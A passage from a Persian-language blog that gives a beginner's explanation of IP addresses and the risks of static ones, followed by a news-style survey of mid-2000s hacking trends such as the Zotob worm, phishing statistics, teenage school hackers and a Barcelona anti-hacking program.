۱۲ ﺭﻗﻤﯽ ﺍﺳﺖ . ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﮑﻦ ﺍﺳﺖ ﺩﺭ ﺣﺎﻝ ﺣﺎﺿﺮ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺷﻤﺎ ۱۹۲ . ۱۶۸ . ۱۲ . ۸ ﺑﺎﺷﺪ . ﻫﺮ ﻗﺴﻤﺖ ﺩﺍﻣﻨﻪ ؟؟؟ ﻣﯽ ﺗﻮﺍﻧﺪ ﻋﺪﺩﯼ ﺑﯿﻦ ۰ ﺍﻟﯽ ۲۵۵ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ . ﭘﺲ ﺩﺍﻣﻨﻪ ﺣﺪ ﻧﻬﺎﯾﺖ ﺍﯾﻦ ﻋﺪﺩ ﺑﻪ ﺍﯾﻦ ﺷﮑﻞ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ۲۵۵ . ۲۵۵ . ۲۵۵. ۲۵۵ . ﻭﺏ ﺳﺎﯾﺘﻬﺎ ﺁﺩﺭﺳﻬﺎﯼ ﺁﯼ ﭘﯽ ﻣﺸﺨﺺ ﻭ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺩﺍﺭﻧﺪ . ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﻗﺴﻤﺖ ﺁﺩﺭﺱ ﻣﺮﻭﺭﮔﺮ ﺍﯾﻨﺘﺮﻧﺖ ﺧﻮﺩ ﺍﯾﻦ ﺍﻋﺪﺍﺩ ﺭﺍ ﺗﺎﯾﭗ ﯾﺎ ﮐﭙﯽ ﻧﻤﺎﯾﯿﺪ ﻭ ﯾﺎ ﺑﺮ ﺭﻭﯼ ﺍﯾﻦ ﻟﯿﻨﮏ ﮐﻠﯿﮏ ﮐﻨﯿﺪ : http:// ۲۱۶ . ۱۰۹. ۱۱۲. ۱۳۵ ﻫﻤﺎﻧﻄﻮﺭ ﮐﻪ ﻣﺸﺎﻫﺪﻩ ﻣﯽ ﮐﻨﯿﺪ ﺍﯾﻦ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﯾﺖ ﯾﺎﻫﻮ ﻣﯽ ﺑﺎﺷﺪ . ﺍﻟﺒﺘﻪ ﺑﻪ ﺩﻟﯿﻞ ﺍﯾﻨﮑﻪ ﺳﺎﯾﺖ ﯾﺎﻫﻮ ﺑﺮ ﺭﻭﯼ ﺳﺮﻭﺭ ( Server ) ﻫﺎﯼ ﺑﺴﯿﺎﺭ ﺯﯾﺎﺩﯼ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﯽ ﺗﻮﺍﻧﺪ ﺁﺩﺭﺱ ﻫﺎﯼ ﺁﯼ ﭘﯽ ﺩﯾﮕﺮﯼ ﻧﯿﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ . ( ﯾﮏ ﻧﻔﻮﺫﮔﺮ ﺍﺯ ﻃﺮﯾﻖ ﻓﺮﻣﺎﻥ Ping ﻭ ﯾﺎ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯾﯽ ﮐﻪ ﺟﻬﺖ ﮐﺸﻒ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﻧﺪ ﻣﯽ ﺗﻮﺍﻧﺪ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﺳﯿﺴﺘﻢ ﻫﺪﻑ ﺭﺍ ﮐﺸﻒ ﮐﻨﺪ ) ﮐﺎﻣﭙﯿﻮﺗﺮ ﺷﻤﺎ ﻧﯿﺰ ﺍﺯ ﻟﺤﻀﻪ ﺍﯼ ﮐﻪ ﺑﻪ ﺍﯾﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ ﺩﺍﺭﺍﯼ ﯾﮏ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﺧﻮﺍﻫﺪ ﺑﻮﺩ . ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻭﯾﻨﺪﻭﺯ ﺍﮐﺲ ﭘﯽ ( XP ) ﯾﺎ ۲۰۰۰ ( ۲ K ) ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽ ﮐﻨﯿﺪ ، ﻣﯽ ﺗﻮﺍﻧﯿﺪ ﺑﺎ ﮐﻠﯿﮏ ﺑﺮ ﺭﻭﯼ ﺁﯾﮑﻦ (Icon ) ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺎﯼ ﮐﻮﭼﮑﯽ ﮐﻪ ﺩﺭ ﮐﻨﺎﺭ ﺳﺎﻋﺖ ﻭﯾﻨﺪﻭﺯ ﺍﺭﺗﺒﺎﻁ ﺷﻤﺎ ﺭﺍ ﺑﺎ ﺍﯾﻨﺘﺮﻧﺖ ﻧﻤﺎﯾﺶ ﻣﯽ ﺩﻫﻨﺪ ﻭ ﺳﭙﺲ ﺍﻧﺘﺨﺎﺏ ﻗﺴﻤﺖ Details ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻗﺴﻤﺖ Client Ip Address ﺑﯿﺎﺑﯿﺪ . ﻗﺴﻤﺖ Server IP Address ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﺳﺮﻭﺭﯼ ﺭﺍ ﮐﻪ ﺩﺭ ﺷﺮﮐﺖ ﺍﺭﺗﺒﺎﻁ ﺩﻫﻨﺪﻩ ﺷﻤﺎ ﺑﺎ ﺍﯾﻨﺘﺮﻧﺖ ( ISP ) ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﺸﺎﻥ ﻣﯽ ﺩﻫﺪ . ﻫﺮ ﺑﺎﺭ ﮐﻪ ﺷﻤﺎ ﺑﻪ ﺍﯾﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻣﯽ ﺷﻮﯾﺪ ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﺍﯾﻨﺘﺮﻧﺖ ﺗﻠﻔﻨﯽ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽ ﮐﻨﯿﺪ ﺍﯾﻦ ﺁﺩﺭﺱ ﺗﻐﯿﯿﺮ ﺧﻮﺍﻫﺪ ﮐﺮﺩ . ﺁﺩﺭﺱ ﻫﺎﯼ ﺁﯼ ﭘﯽ ﻣﺘﻐﯿﺮ ﺁﺩﺭﺳﻬﺎﯼ Dynamic ﻧﺎﻣﯿﺪﻩ ﻣﯽ ﺷﻮﻧﺪ . ﺩﻭﺳﺘﺎﻧﯽ ﮐﻪ ﺍﺯ ﺍﯾﻨﺘﺮﻧﺖ ﭘﺮ ﺳﺮﻋﺖ ﺑﻬﺮﻩ ﻣﯽ ﺑﺮﻧﺪ ، ﻧﻈﯿﺮ DSL ﻭ ﯾﺎ ADSL ﻣﻤﮑﻦ ﺍﺳﺖ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﻫﻤﻮﺍﺭﻩ ﺛﺎﺑﺘﯽ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ . ﺍﯾﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﯽ ﺷﻮﺩ ﮐﻪ ﺩﺭ ﺧﻄﺮ ﺑﯿﺸﺘﺮﯼ ﻧﺴﺒﺖ ﺑﻪ ﺳﺎﯾﺮﯾﻦ ﻗﺮﺍﺭ ﮔﯿﺮﻧﺪ . ﺁﺩﺭﺳﻬﺎﯼ ﺁﯼ ﭘﯽ ﺛﺎﺑﺖ ﺁﺩﺭﺳﻬﺎﯼ Static ﻧﺎﻣﯿﺪﻩ ﻣﯽ ﺷﻮﻧﺪ . ﺑﻪ ﺍﯾﻦ ﻋﻠﺖ ﮐﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺎ ﯾﺎﻓﺘﻦ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﺛﺎﺑﺖ ، ﺍﻧﺮﮊﯼ ﻭ ﺗﻮﺍﻥ ﺧﻮﺩ ﺭﺍ ﻣﻌﻄﻮﻑ ﺑﻪ ﺳﺎﯾﺮ ﻣﺮﺍﺣﻞ ﻧﻔﻮﺫ ﻣﯽ ﻧﻤﺎﯾﺪ ﻭ ﺍﯾﻦ ﻣﺸﮑﻞ ﺑﺰﺭﮒ ﺭﺍ ﻧﺪﺍﺭﺩ ﮐﻪ ﺳﯿﺴﺘﻢ ﻫﺪﻑ ﺑﺎ ﻫﺮ ﺑﺎﺭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﯾﻨﺘﺮﻧﺖ ، ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﻣﺘﻔﺎﻭﺗﯽ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ . ﯾﮏ ﻣﻬﺎﺟﻢ ﺑﺎ ﺩﺍﺷﺘﻦ ﺁﺩﺭﺱ ﺁﯼ ﭘﯽ ﻭ ﭘﻮﺭﺗﯽ ﮐﻪ ﺩﺭ ﺁﻥ ﻟﺤﻀﻪ ﺑﺮ ﺭﻭﯼ ﺳﯿﺴﺘﻢ ﻫﺪﻑ ﺑﺎﺯ ﺍﺳﺖ ، ﻣﯽ ﺗﻮﺍﻧﺪ ﺑﻪ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺪﻑ ، ﺍﺯ ﻃﺮﯾﻖ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﻨﺎﺳﺐ ﻣﺘﺼﻞ ﺷﻮﺩ . ﻧﮑﺘﻪ ﺍﯼ ﮐﻪ ﺩﺭ ﻣﻮﺭﺩ ﺭﻭﺵ ﻫﺎﯼ ﻧﻔﻮﺫ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﯾﻦ ﺍﺳﺖ ﮐﻪ ﺑﯿﺸﺘﺮ ﻧﻔﻮﺫﮔﺮﺍﻥ ، ﭼﻨﺎﻧﭽﻪ ﻗﺼﺪ ﻧﻔﻮﺫ ﺑﻪ ﯾﮏ ﺳﯿﺴﺘﻢ ﻭﺍﺣﺪ ﮐﺎﻣﭙﯿﻮﺗﺮﯼ ( ﻧﻈﯿﺮ ﯾﮏ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺧﺎﻧﮕﯽ ) ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ، ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺭﺍ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﻭ ﺳﺮﻭﯾﺲ ﻫﺎﯼ ﺧﻮﺩ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﺗﺮﺟﯿﺢ ﻣﯽ ﺩﻫﻨﺪ . ﻫﻢ ﺑﻪ ﺍﯾﻦ ﻋﻠﺖ ﮐﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻣﺨﺮﺏ ﺗﻨﻮﻉ ﻭ ﺍﻧﻌﻄﺎﻑ ﺑﯿﺸﺘﺮﯼ ﺩﺍﺭﻧﺪ ﻭ ﻫﻢ ﺍﯾﻨﮑﻪ ﻓﻘﻂ ﻋﺪﻩ ﺧﺎﺻﯽ ﺍﺯ ﻫﮑﺮﻫﺎﯼ ﭘﯿﺸﺮﻓﺘﻪ ، ﺗﻮﺍﻧﺎﯾﯽ ﻭ ﺩﺍﻧﺶ ﻻﺯﻡ ﺭﺍ ﺟﻬﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﻭ ﺳﺮﻭﯾﺲ ﻫﺎﯼ ﺩﺍﺧﻠﯽ ﺳﯿﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎ ﺩﺭ ﺍﺧﺘﯿﺎﺭ ﺩﺍﺭﻧﺪ . ﺑﻪ ﻫﻤﯿﻦ ﺩﻟﯿﻞ ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻄﺎﻟﺐ ﺳﺎﯾﺖ ﻣﻮﺿﻮﻉ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻣﺨﺮﺏ ﺭﺍ ﺑﯿﺸﺘﺮ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺧﻮﺍﻫﯿﻢ ﺩﺍﺩ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺁﻧﻬﺎ ﻭ ﺭﻭﺵ ﻫﺎﯼ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﺁﻧﻬﺎ ﺑﺤﺚ ﺧﻮﺍﻫﯿﻢ ﻧﻤﻮﺩ

برچسب: روش هاے هـک, نویسنده: SASHA PAYDAR تاريخ: چهارشنبه 11 شهريور 1394 ساعت: 7:45

ﺷﺎﯾﺪ ﺷﻤﺎ ﻧﯿﺰ ﺗﺎﮐﻨﻮﻥ ﺧﺒﺮﻫﺎﯼ ﻣﺨﺘﻠﻔﯽ ﺩﺭ ﺧﺼﻮﺹ ﺣﻤﻠﻪ ﻫﺎﯼ ﻫﮑﺮﯼ ﺷﻨﯿﺪﻩ ﺑﺎﺷﯿﺪ ﺍﻣﺎ ﺁﯾﺎ ﺗﺎ ﺑﻪ ﺣﺎﻝ ﺑﺮﺍﯾﺘﺎﻥ ﺍﯾﻦ ﺳﻮﺍﻝ ﻣﻄﺮﺡ ﺷﺪﻩ ﮐﻪ ﺍﻭﻟﯿﻦ ﺣﻤﻼﺕ ﻫﮑﺮﯼ ﺩﺭ ﭼﻪ ﺗﺎﺭﯾﺨﯽ ﺁﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ . ﺩﺭ ﭘﺎﺳﺦ ﺑﺎﯾﺪ ﮔﻔﺖ ﺧﺒﺮﻫﺎﯼ ﻣﺮﺑﻮﻁ ﺑﻪ ﺣﻤﻼﺕ ﻫﮑﺮﯼ ﺩﺭ ﺧﺎﻭﺭﻣﯿﺎﻧﻪ ﺩﺭ ﺁﮔﻮﺳﺖ ﺳﺎﻝ ۲۰۰۵ ﻣﻨﺘﺸﺮ ﺷﺪ .ﮔﻔﺘﻪ ﻣﯽ ﺷﻮﺩ ﺩﺭ ﺁﻥ ﺯﻣﺎﻥ ﺩﻭ ﻧﻔﺮ ﺩﺭ ﻣﺮﺍﮐﺶ ﻭ ﺗﺮﮐﯿﻪ ﺑﻪ ﺟﺮﻡ ﻫﻤﮑﺎﺭﯼ ﺩﺭ ﺯﻣﯿﻨﻪ ﻃﺮﺍﺣﯽ ﻭ ﺗﻮﺯﯾﻊ ﮐﺮﻡ ﻣﺨﺮﺏ Zotob ﺩﺳﺘﮕﯿﺮ ﺷﺪﻧﺪ ﺍﻣﺎ ﺳﯿﻤﻮﻥ ﻫﺮﻭﻥ ﺍﺯ ﻣﻮﺳﺴﻪ ﺍﻣﻨﯿﺘﯽ Network Box ﻧﻈﺮ ﺩﯾﮕﺮﯼ ﺩﺍﺭﺩ ﭼﺮﺍ ﮐﻪ ﺍﻭ ﻣﻌﺘﻘﺪ ﺍﺳﺖ ﺩﺭ ﺳﺎﻝ ۲۰۰۶ ﻧﻮﯾﺴﻨﺪﮔﺎﻥ ﻭﯾﺮﻭﺱ ﻫﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﺟﺎﺳﻮﺳﯽ ﺩﺭ ﺟﺴﺖ ﻭﺟﻮﯼ ﺭﺍﻩ ﻫﺎﯼ ﺟﺪﯾﺪﯼ ﺑﺮﺁﻣﺪﻧﺪ ﺗﺎ ﺗﻮﻟﯿﺪﺍﺕ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﺎﻥ ﺭﺍﯾﺎﻧﻪ ﻫﺎﯼ ﮐﺎﺭﺑﺮﺍﻥ ﺑﯽ ﮔﻨﺎﻩ ﺑﯿﻨﺪﺍﺯﻧﺪ ﻭ ﯾﮑﯽ ﺍﺯ ﺑﻬﺘﺮﯾﻦ ﺭﻭﺵ ﻫﺎ ﺑﺮﺍﯼ ﺍﯾﻦ ﮐﺎﺭ ﻣﺨﻔﯽ ﮐﺮﺩﻥ ﻭﯾﺮﻭﺱ ﻫﺎ ﻭ ﮐﺮﻡ ﻫﺎﯼ ﺍﯾﻨﺘﺮﻧﺘﯽ ﺩﺭ ﭘﻮﺷﺶ ﻓﺎﯾﻞ ﻫﺎﯼ ﻣﻮﺳﯿﻘﯽ ﻭ ﻭﯾﺪﺋﻮ ﺍﺳﺖ . ﺯﯾﺮﺍ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺭﺷﺪ ﻓﺰﺍﯾﻨﺪﻩ ﺩﺳﺘﮕﺎﻩ ﻫﺎﯼ ﻗﺎﺑﻞ ﺣﻤﻞ ﭘﺨﺶ ﻣﻮﺳﯿﻘﯽ، ﮔﻮﺷﯽ ﻫﺎﯼ ﻫﻮﺷﻤﻨﺪ ﻭ ﺩﺭﺍﯾﻮﻫﺎﯼ ﻓﻼﺵ ﺑﺎ ﻇﺮﻓﯿﺖ ﺑﺎﻻ ﺗﻌﺪﺍﺩ ﺑﯿﺸﺘﺮﯼ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﻪ ﮔﻮﺵ ﮐﺮﺩﻥ ﻣﻮﺳﯿﻘﯽ ﺑﺎ ﺍﯾﻦ ﺭﻭﺵ ﺭﻭﯼ ﻣﯽ ﺁﻭﺭﻧﺪ ﻭ ﺳﻌﯽ ﻣﯽ ﮐﻨﻨﺪ ﻓﺎﯾﻞ ﻫﺎﯼ ﻣﻮﺳﯿﻘﯽ ﻣﻮﺭﺩ ﻧﻈﺮﺷﺎﻥ ﺭﺍ ﺩﺭ ﺍﯾﻨﺘﺮﻧﺖ ﯾﺎﻓﺘﻪ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺭﮔﺬﺍﺭﯼ ﮐﻨﻨﺪ . ﻫﮑﺮﻫﺎ ﻫﻢ ﺩﻗﯿﻘﺎً ﺍﺯ ﻫﻤﯿﻦ ﻋﻼﻗﻪ ﺳﻮﺀﺍﺳﺘﻔﺎﺩﻩ ﮐﺮﺩﻩ ﻭ ﺗﻮﻟﯿﺪﺍﺕ ﻣﺨﺮﺏ ﺷﺎﻥ ﺭﺍ ﺑﻪ ﺟﺎﯼ ﻓﺎﯾﻞ ﻫﺎﯼ ﻣﻮﺳﯿﻘﯽ ﻭ ﻭﯾﺪﺋﻮ ﺟﺎ ﻣﯽ ﺯﻧﻨﺪ . ﻧﮑﺘﻪ ﺩﯾﮕﺮﯼ ﮐﻪ ﻫﺮﻭﻥ ﺑﻪ ﺁﻥ ﺍﺷﺎﺭﻩ ﻣﯽ ﮐﻨﺪ ﺍﻓﺰﺍﯾﺶ ﺣﻤﻠﻪ ﺑﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯾﯽ ﺍﺳﺖ ﮐﻪ ﺑﺮﺍﯼ ﻓﻌﺎﻟﯿﺖ ﻫﺎﯼ ﺟﻤﻌﯽ ﺩﺭ ﺷﺒﮑﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ . ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺣﻤﻠﻪ ﺑﻪ ﺷﺒﮑﻪ ﻫﺎﯼ ﺍﺭﺳﺎﻝ ﭘﯿﺎﻡ ﻓﻮﺭﯼ ﺩﺭ ﺣﺎﻝ ﺍﻓﺰﺍﯾﺶ ﺍﺳﺖ ﻭ ﺍﻧﺘﻈﺎﺭ ﻣﯽ ﺭﻭﺩ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﻓﺰﺍﯾﺶ ﺳﺎﺯﮔﺎﺭﯼ ﻭ ﻫﻤﺎﻫﻨﮕﯽ ﺑﯿﻦ ﻓﻌﺎﻟﯿﺖ ﺷﺒﮑﻪ ﻫﺎﯼ ﻣﺨﺘﻠﻒ ﻣﺴﻨﺠﺮﯼ ﺍﯾﻦ ﺭﻭﻧﺪ ﺗﺸﺪﯾﺪ ﺷﻮﺩ . ﺩﺭ ﻫﻤﯿﻦ ﺣﺎﻝ ﺣﻤﻼﺕ Phishing ﺑﺎ ﻫﺪﻑ ﺧﺎﻟﯽ ﮐﺮﺩﻥ ﺣﺴﺎﺏ ﻫﺎﯼ ﺑﺎﻧﮑﯽ ﺍﻓﺮﺍﺩ ﻫﻢ ﺑﻪ ﺷﺪﺕ ﺩﺭ ﻣﯿﺎﻥ ﺧﺮﺍﺑﮑﺎﺭﺍﻥ ﺍﯾﻨﺘﺮﻧﺘﯽ ﻣﺤﺒﻮﺏ ﺷﺪﻩ . ﺑﻪ ﮔﺰﺍﺭﺵ IBM ﺩﺭ ﺣﺎﻟﯽ ﮐﻪ ﺩﺭ ﺳﺎﻝ ۲۰۰۴ ﺍﺯ ﻫﺮ ۹۴۳ ﭘﯿﺎﻡ ﺍﻟﮑﺘﺮﻭﻧﯿﮑﯽ ﯾﮑﯽ ﺑﺎ ﻫﺪﻑ ﭘﯿﺸﺒﺮﺩ ﯾﮏ ﺣﻤﻠﻪ Phishing ﺗﻨﻈﯿﻢ ﺷﺪﻩ ﺑﻮﺩ، ﺍﻣﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۵ ﺍﺯ ﻫﺮ ۳۰۴ ﻧﺎﻣﻪ ﺍﻟﮑﺘﺮﻭﻧﯿﮑﯽ ﯾﮑﯽ ﺑﺎ ﺍﯾﻦ ﻫﺪﻑ ﺗﻨﻈﯿﻢ ﺷﺪﻩ ﺍﺳﺖ . ● ﻣﺪﺭﺳﻪ ﻫﮑﺮﻫﺎ ﻋﻼﻭﻩ ﺑﺮ ﺗﻤﺎﯾﻞ ﻫﮑﺮﻫﺎ ﺑﺮﺍﯼ ﻧﻔﻮﺫ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻫﺎﯼ ﮐﺎﺭﺑﺮﺩﯼ ﭘﺮﻃﺮﻓﺪﺍﺭ ﻭ ﺳﻮﺀﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﻔﺮﻩ ﻫﺎﯼ ﺍﻣﻨﯿﺘﯽ ﻣﯽ ﺗﻮﺍﻥ ﺑﻪ ﺻﺮﺍﺣﺖ ﮔﻔﺖ ﻧﻮﺟﻮﺍﻧﺎﻥ ﺍﯾﻦ ﺩﻭﺭﻩ ﻭ ﺯﻣﺎﻧﻪ ﻧﺴﺒﺖ ﺑﻪ ﻧﺴﻞ ﻗﺒﻠﯽ ﺁﮔﺎﻫﯽ ﻫﺎﯼ ﺑﺴﯿﺎﺭ ﺑﯿﺸﺘﺮﯼ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﯾﺎﻧﻪ ﺩﺍﺭﻧﺪ، ﺍﺯ ﺍﯾﻦ ﺭﻭ ﺑﺮﺍﯼ ﺍﺛﺒﺎﺕ ﺩﺍﻧﺶ ﺑﺎﻻﯼ ﺧﻮﺩ ﺑﻪ ﺧﺮﺍﺑﮑﺎﺭﯼ ﺩﺭ ﺭﺍﯾﺎﻧﻪ ﻫﺎ ﻣﺘﻮﺳﻞ ﻣﯽ ﺷﻮﻧﺪ ﻭ ﭘﺎ ﺑﻪ ﭘﺎﯼ ﻫﮑﺮﻫﺎﯼ ﺳﺎﺑﻘﻪ ﺩﺍﺭ ﻭ ﻗﺪﺭ ﺳﻌﯽ ﺩﺭ ﺍﺯ ﮐﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﯿﺴﺘﻢ ﻫﺎ ﺩﺍﺭﻧﺪ . ﮔﺮﻭﻫﯽ ﻧﻮﺟﻮﺍﻥ ﮐﻪ ﺍﺳﻢ ﺧﻮﺩ ﺭﺍ Kutztown ۱۳ ﮔﺬﺍﺭﺩﻩ ﺍﻧﺪ، ﺍﻓﺘﺨﺎﺭ ﺷﺎﻥ ﻫﮏ ﮐﺮﺩﻥ ﻟﭗ ﺗﺎﭖ ﻫﺎﯼ ﻣﻮﺟﻮﺩ ﺩﺭ ﻣﺪﺍﺭﺱ، ﺑﺎﺭﮔﺬﺍﺭﯼ ﻣﺤﺘﻮﯾﺎﺕ ﻣﻤﻨﻮﻋﻪ ﺍﺯ ﺍﯾﻨﺘﺮﻧﺖ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﯼ ﻏﯿﺮﻣﺠﺎﺯ ﺑﺮﺍﯼ ﺟﺎﺳﻮﺳﯽ ﺩﺭ ﻣﻮﺭﺩ ﻣﻌﻠﻤﺎﻥ ﻣﺪﺍﺭﺱ ﻭ ﺩﯾﮕﺮ ﺩﺍﻧﺶ ﺁﻣﻮﺯﺍﻥ ﺍﺳﺖ . ﺍﻟﺒﺘﻪ ﺍﻓﺸﺎ ﺷﺪﻥ ﺍﻗﺪﺍﻣﺎﺕ ﺧﻼﻓﮑﺎﺭﺍﻧﻪ ﺍﯾﻦ ﻧﻮﺟﻮﺍﻧﺎﻥ ﺑﺎﻋﺚ ﺑﺮﺧﻮﺭﺩ ﺷﺪﯾﺪ ﭘﻠﯿﺲ ﻭ ﺩﯾﮕﺮ ﻣﻘﺎﻣﺎﺕ ﺷﺪ ﻭ ﺁﻧﺎﻥ ﺑﻪ ﺳﺨﺘﯽ ﻣﺠﺎﺯﺍﺕ ﺷﺪﻧﺪ . ﻣﻘﺎﻣﺎﺕ ﻣﺪﺭﺳﻪ Kutztown ﻣﺤﻞ ﺗﺤﺼﯿﻞ ﺍﯾﻦ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻣﯽ ﮔﻮﯾﻨﺪ ﭘﺲ ﺍﺯ ﺷﻨﺎﺳﺎﯾﯽ ﺍﯾﻦ ﻧﻮﺟﻮﺍﻧﺎﻥ ﺑﺎﺭﻫﺎ ﺑﻪ ﺁﻧﺎﻥ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﺑﻮﺩﻧﺪ ﮐﻪ ﺩﺳﺖ ﺍﺯ ﺍﻋﻤﺎﻝ ﺧﻼﻓﮑﺎﺭﺍﻧﻪ ﺑﺮﺩﺍﺭﻧﺪ ﻭﮔﺮﻧﻪ ﻣﺠﺎﺯﺍﺕ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﺍﻣﺎ ﺑﯽ ﺗﻮﺟﻬﯽ ﺑﻪ ﺍﯾﻦ ﺍﺧﻄﺎﺭﻫﺎ ﻣﻮﺟﺐ ﺷﺪﻩ ﺑﻮﺩ ﭘﻠﯿﺲ ﺑﺮﺍﯼ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺧﻼﻓﮑﺎﺭﺍﻥ ﮐﻮﭼﮏ ﻭﺍﺭﺩ ﻋﻤﻞ ﺷﻮﺩ . ﻓﻌﺎﻟﯿﺖ ﻫﺎﯼ ﺭﺍﯾﺎﻧﻪ ﯾﯽ ﺧﺮﺍﺑﮑﺎﺭﺍﻧﻪ ﺩﺭ ﺍﻣﺮﯾﮑﺎ ﻓﻘﻂ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﯾﻦ ﻣﺪﺭﺳﻪ ﻧﯿﺴﺖ . ﻣﺪﯾﺮﺍﻥ ﺩﻩ ﻫﺎ ﻣﺪﺭﺳﻪ ﺩﺭ ﺍﯾﺎﻟﺖ ﭘﻨﺴﯿﻠﻮﺍﻧﯿﺎ ﮔﺰﺍﺭﺵ ﻫﺎﯾﯽ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺳﻮﺀﺍﺳﺘﻔﺎﺩﻩ ﺩﺍﻧﺶ ﺁﻣﻮﺯﺍﻥ ﺍﺯ ﺭﺍﯾﺎﻧﻪ ﻫﺎﯼ ﻣﺪﺍﺭﺱ ﺑﻪ ﭘﻠﯿﺲ ﺍﺭﺍﺋﻪ ﮐﺮﺩﻩ ﺍﻧﺪ ﻭ ﺩﺭ ﺑﺮﺧﯽ ﻣﻮﺍﺭﺩ ﺩﺍﻧﺶ ﺁﻣﻮﺯﺍﻥ ﺑﻪ ﺧﺎﻃﺮ ﻫﻤﯿﻦ ﮔﺰﺍﺭﺵ ﻫﺎ ﺗﻮﺑﯿﺦ ﯾﺎ ﺣﺘﯽ ﺍﺧﺮﺍﺝ ﺷﺪﻩ ﺍﻧﺪ . ● ﯾﮏ ﺩﺍﻧﺸﮕﺎﻩ ﺿﺪﻫﮏ ﺷﻬﺮ ﺑﺎﺭﺳﻠﻮﻧﺎ ﺩﺭ ﺍﺳﭙﺎﻧﯿﺎ ﺍﻣﺮﻭﺯﻩ ﻣﺤﻞ ﺍﺟﺮﺍﯼ ﯾﮏ ﻃﺮﺡ ﺍﺑﺘﮑﺎﺭﯼ ﺷﺪﻩ ﮐﻪ ﺑﺎ ﻫﺪﻑ ﻣﺒﺎﺭﺯﻩ ﻭ ﻧﺎﺑﻮﺩ ﺳﺎﺯﯼ ﻫﮑﺮﻫﺎ ﺭﺍﻩ ﺍﻧﺪﺍﺯﯼ ﺷﺪﻩ ﺍﺳﺖ . ﺩﺍﻧﺸﮑﺪﻩ ﻫﮑﺮﯼ ﺩﺍﻧﺸﮕﺎﻩ La salle ﯾﮏ ﺩﺍﻧﺸﮑﺪﻩ ﺗﺎﺯﻩ ﺗﺎﺳﯿﺲ 